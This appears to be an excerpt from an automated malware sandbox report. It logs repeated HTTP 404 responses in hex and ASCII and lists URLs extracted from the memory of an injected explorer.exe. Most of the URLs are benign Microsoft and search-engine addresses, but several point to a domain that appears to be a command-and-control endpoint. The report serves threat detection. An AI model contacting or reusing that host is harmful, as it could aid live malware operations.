20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:25 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:38:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:39:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:39:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:39:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:39:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:39:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:40:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:40:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:40:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Mon, 30 Sep 2024 13:41:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Source: explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000002.00000000.1506409569.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: explorer.exe, 00000002.00000000.1504585767.0000000004405000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ns.adobeS
Source: explorer.exe, 00000002.00000000.1506409569.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.1506409569.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000002.00000000.1504054456.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1505677351.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1505690894.0000000007720000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000000.1506409569.0000000009237000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSA4
Source: explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSd
Source: explorer.exe, 00000002.00000000.1504995292.000000000702D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000002.00000000.1506409569.00000000090DA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000002.00000000.1506409569.00000000091FB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2429108620.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2429108620.0000000000DD6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/
Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/WN/
Source: explorer.exe, 0000000B.00000002.2429108620.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/application/x-www-form-urlencodedMozilla/5.0
Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/earch.php
Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.2429108620.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2385078500.00000000011A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3874970360.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3874368668.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3874757842.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.3873766554.0000000000E29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/search.php
Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/search.php=
Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D58000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2385078500.00000000011A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.3874970360.0000000000C87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.3874368668.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000002.3874757842.0000000000B07000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000011.00000002.3873766554.0000000000E29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com/search.phpMozilla/5.0
Source: explorer.exe, 0000000B.00000002.2429108620.0000000000D93000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://calvinandhalls.com:443/search.phpt
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: explorer.exe, 00000002.00000000.1508355661.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
Source: explorer.exe, 00000002.00000000.1508355661.000000000BC80000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://java.co
Source: explorer.exe, 00000002.00000000.1508355661.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000002.00000000.1508355661.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comer
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000000.1508355661.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/EM0
Source: explorer.exe, 00000002.00000000.1508355661.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com48
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: explorer.exe, 0000000B.00000003.2401255932.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, EE52.tmp.11.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
